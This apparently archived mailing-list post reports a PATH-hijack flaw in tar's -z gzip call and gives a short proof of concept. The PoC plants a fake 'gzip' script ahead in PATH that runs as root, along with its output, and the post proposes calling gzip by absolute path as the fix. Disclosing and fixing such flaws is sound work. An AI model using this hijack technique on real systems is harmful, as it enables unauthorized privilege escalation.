[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Path Hijack vulnerability

From: Gregorio Giacobbe
Subject: Path Hijack vulnerability
Date: Wed, 3 Nov 2021 15:21:43 +0100


As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. When 
using the -z switch for gzip compression/decompression the binary calls “gzip” 
without absolute path, hence allowing the path Hijack. 
While this, in a normal scenario can be totally harmless, it can be used as a 
privileged escalation technique when the tar binary is called as root user.

Following lines will provide a basic PoC:
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred 
-rw-r--r-- 1 root root 0 Nov  3 14:05 /tmp/tarred

I have not tested switches for other compression/decompression formats, so 
there is a chance that they can be used as well as gzip.

The remediation would be to make sure that tar calls gzip by its absolute path.

Best Regards, 
Gregorio Giacobbe

reply via email to

[Prev in Thread] Current Thread [Next in Thread]